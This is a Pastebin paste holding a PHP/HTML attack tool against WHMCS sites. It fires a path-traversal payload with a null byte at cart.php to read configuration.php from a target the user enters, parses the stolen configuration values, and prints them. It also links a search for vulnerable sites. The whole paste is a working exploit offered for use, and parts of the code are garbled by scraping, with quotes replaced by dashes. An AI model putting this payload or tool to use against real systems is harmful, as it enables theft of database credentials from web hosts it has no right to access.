Advertisement
Kyfx

WHCMS Cart Exploit Tool

May 21st, 2015
551
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.53 KB | None | 0 0
  1. <?php
  2. /**
  3. * WHCMS Cart Exploit Tool
  4. * **projectx
  5. * http://www.exploit-db.com/exploits/17999/
  6. * Develop By : Group x3 | Dr.KroOoZ |
  7. **/
  8.  
  9. ** default payload
  10. $payload = "cart.php?a=projectx&templatefile=../../../configuration.php%00";
  11.  
  12. ** site checker
  13.  
  14.  
  15. $check = --;
  16.  
  17. if(!empty($_GET['site']) && !empty($_GET['payload'])){
  18.  
  19. ** yum yum!
  20. $yum = array();
  21.  
  22. $payload = base64_decode($_GET['payload']);
  23.  
  24. $site = trim($_GET['site'],-/-);
  25. $http = stristr($site,'http://-);
  26. if($http){
  27. $site = $http;
  28. } else {
  29. $site = "http://$site";
  30. }
  31.  
  32. $exploit = -$site/$payload";
  33.  
  34. if ($stream = @fopen($exploit, 'r')) {
  35. echo -<strong>- . $exploit . -</strong><br>-;
  36.  
  37. $data = trim(stristr(stristr(stream_get_contents($stream), -<?php'), -?>-, true), -<?php');
  38. $data = explode(-;-,trim($data));
  39. $data = array_filter($data);
  40.  
  41. foreach($data as $datum){
  42. $datum = explode(-=-,$datum);
  43. $yum[trim($datum[0])] = $datum[1];
  44. }
  45.  
  46. echo -<pre>-;
  47. print_r($yum);
  48. echo -</pre>-;
  49.  
  50. ** bug? causes apache to crash :O
  51. // $pattern = -/<?php+(.|s)+?>/-;
  52. // preg_match($pattern, $data, $matches);
  53. // var_dump($matches);
  54.  
  55. fclose($stream);
  56. } else {
  57. $check = -<a target='_new' href=-$site/cart.php?a=projectx&templatefile=../../../configuration.php%00'>Press Here to Check Don't Forget See From Source</a>-;
  58. }
  59.  
  60. }
  61. ?>
  62. <html>
  63. <head>
  64. <title>WHCMS Exploit Tool</title>
  65. <link rel="shortcut icon" type="image/jpg" href="http://www.theprojectxblog.net/wp-content/uploads/2011/10/cropped-297465_202385663163007_202385503163023_447971_677009595_a.jpg">
  66. *********
  67. body, input { background: black; color: white; font-family: calibri; font-size: 1.1em; }
  68. input[type=text] { width: 600px; } input { border: solid 1px white; }
  69. span { display: inline-block; width: 60px; margin-right: 10px; }
  70. a { text-decoration: none; color: red; } img { float: left; margin-right: 10px; }
  71. </style>
  72. **********
  73. var Base64 = {
  74.  
  75. // private property
  76. _keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=-,
  77.  
  78. // public method for encoding
  79. encode : function (input) {
  80. var output = --;
  81. var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
  82. var i = 0;
  83.  
  84. input = Base64._utf8_encode(input);
  85.  
  86. while (i < input.length) {
  87.  
  88. chr1 = input.charCodeAt(i++);
  89. chr2 = input.charCodeAt(i++);
  90. chr3 = input.charCodeAt(i++);
  91.  
  92. enc1 = chr1 >> 2;
  93. enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
  94. enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
  95. enc4 = chr3 & 63;
  96.  
  97. if (isNaN(chr2)) {
  98. enc3 = enc4 = 64;
  99. } else if (isNaN(chr3)) {
  100. enc4 = 64;
  101. }
  102.  
  103. output = output +
  104. this._keyStr.charAt(enc1) + this._keyStr.charAt(enc2) +
  105. this._keyStr.charAt(enc3) + this._keyStr.charAt(enc4);
  106.  
  107. }
  108.  
  109. return output;
  110. },
  111.  
  112. // public method for decoding
  113. decode : function (input) {
  114. var output = --;
  115. var chr1, chr2, chr3;
  116. var enc1, enc2, enc3, enc4;
  117. var i = 0;
  118.  
  119. input = input.replace(/[^A-Za-z0-9+/=]/g, --);
  120.  
  121. while (i < input.length) {
  122.  
  123. enc1 = this._keyStr.indexOf(input.charAt(i++));
  124. enc2 = this._keyStr.indexOf(input.charAt(i++));
  125. enc3 = this._keyStr.indexOf(input.charAt(i++));
  126. enc4 = this._keyStr.indexOf(input.charAt(i++));
  127.  
  128. chr1 = (enc1 << 2) | (enc2 >> 4);
  129. chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
  130. chr3 = ((enc3 & 3) << 6) | enc4;
  131.  
  132. output = output + String.fromCharCode(chr1);
  133.  
  134. if (enc3 != 64) {
  135. output = output + String.fromCharCode(chr2);
  136. }
  137. if (enc4 != 64) {
  138. output = output + String.fromCharCode(chr3);
  139. }
  140.  
  141. }
  142.  
  143. output = Base64._utf8_decode(output);
  144.  
  145. return output;
  146.  
  147. },
  148.  
  149. // private method for UTF-8 encoding
  150. _utf8_encode : function (string) {
  151. string = string.replace(/rn/g,"n");
  152. var utftext = --;
  153.  
  154. for (var n = 0; n < string.length; n++) {
  155.  
  156. var c = string.charCodeAt(n);
  157.  
  158. if (c < 128) {
  159. utftext += String.fromCharCode(c);
  160. }
  161. else if((c > 127) && (c < 2048)) {
  162. utftext += String.fromCharCode((c >> 6) | 192);
  163. utftext += String.fromCharCode((c & 63) | 128);
  164. }
  165. else {
  166. utftext += String.fromCharCode((c >> 12) | 224);
  167. utftext += String.fromCharCode(((c >> 6) & 63) | 128);
  168. utftext += String.fromCharCode((c & 63) | 128);
  169. }
  170.  
  171. }
  172.  
  173. return utftext;
  174. },
  175.  
  176. // private method for UTF-8 decoding
  177. _utf8_decode : function (utftext) {
  178. var string = --;
  179. var i = 0;
  180. var c = c1 = c2 = 0;
  181.  
  182. while ( i < utftext.length ) {
  183.  
  184. c = utftext.charCodeAt(i);
  185.  
  186. if (c < 128) {
  187. string += String.fromCharCode(c);
  188. i++;
  189. }
  190. else if((c > 191) && (c < 224)) {
  191. c2 = utftext.charCodeAt(i+1);
  192. string += String.fromCharCode(((c & 31) << 6) | (c2 & 63));
  193. i += 2;
  194. }
  195. else {
  196. c2 = utftext.charCodeAt(i+1);
  197. c3 = utftext.charCodeAt(i+2);
  198. string += String.fromCharCode(((c & 15) << 12) | ((c2 & 63) << 6) | (c3 & 63));
  199. i += 3;
  200. }
  201.  
  202. }
  203.  
  204. return string;
  205. }
  206.  
  207. }
  208. </script>
  209. </head>
  210. <body>
  211.  
  212. <p align="left">
  213.  
  214. <img src="http://www.theprojectxblog.net/wp-content/uploads/2011/10/cropped-297465_202385663163007_202385503163023_447971_677009595_a.jpg" /> </p><form method='get' onSubmit="javascript:payload.value = Base64.encode(payload.value);->
  215. <p align="left">
  216. <span>target:</span> <input type='text' name='site' value='put url without http://-/> <?php echo $check; ?><br/>
  217. <span>payload:</span> <input type='text' name='payload' value=-<?php echo $payload; ?>-/> <input type='submit' value='Exploit' /> </p></form><!-- brgzkreclwwp --><p align="center">Search For Site : <a href="http://www.bing.com/search?q=powered+by+whmcompletesolution+cart.php&go=&form=QBRE&filt=all">Press Here</a></p><p align="center">Develop By : Group x3 | Dr.KroOoZ</p><p align="center"><font size="3">Gerttz: ~ Group Hp-Hack</font></p></body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement